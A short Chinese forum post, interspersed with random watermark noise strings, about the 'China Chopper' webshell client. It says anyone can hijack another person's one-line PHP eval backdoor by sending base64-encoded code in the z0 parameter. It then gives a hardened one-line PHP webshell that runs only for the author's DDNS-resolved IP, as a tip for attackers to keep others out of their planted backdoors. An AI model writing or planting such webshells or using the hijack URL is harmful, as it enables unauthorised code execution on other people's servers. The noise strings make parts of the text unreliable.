今天试了下“中国菜刀”这款C/S的WEB管理软件,发现一个致命的漏洞
/ k) r# E6 n- o3 R! Y8 D7 W( v8 ]2 Y" D6 O
就算你设置了密码,使用了eval($_REQUEST['moyo']);
6 D, D" e S6 E$ g+ [ w# B8 q! f- i6 s6 Q: H9 z6 e
但是别人还是可以在不知道连接密码是moyo的情况下直接使用你的一句话后门3 i: r6 x0 C$ B. x
6 c6 r) L o E2 M# C因为$_REQUEST['moyo']传递的内容是@eval(base64_decode($_POST[z0]));
; y+ P. K7 K' Q" S7 t" I4 w4 H t' f+ e8 V4 k2 e( K
直接访问 /backdoor.php?z0={BASE64加密后的代码} 就可以执行代码了
4 _. ~9 W1 \: e" @0 x8 m+ C8 L8 L% [0 I; S- g
不知道是设计缺陷还是故意留的后门
3 L7 a. B1 _5 c0 B0 j4 D
& ]2 `+ A- F" O2 Q* x/ d如果有人使用一句话之类的密码,有个小技巧可以避免自己的一句话被人盗用 Q8 |: Q! d) f. [2 W. ^4 r
( I& F' A9 c( I本地使用花生壳之类的DDNS软件,比如分配域名是moyo.apiz.org, j! L, ?6 g# {+ V1 O
( u, |, ~9 d Q) m$ ~
然后一句话后门这样写! Z6 y6 T; a8 d0 h
0 z j' e* R" [. b6 ^5 {/ m9 x<?php $_SERVER['REMOTE_ADDR'] == gethostbyname('moyo.apiz.org') ? @eval($_REQUEST['moyo']) : exit('DENIED') ?>( j D% d6 {7 U- v
这样就可以让一句话后门只允许自己的电脑连接了: w* Y7 C& M' ^
/ A7 f6 b+ Y2 Q/ g( F& L3 c |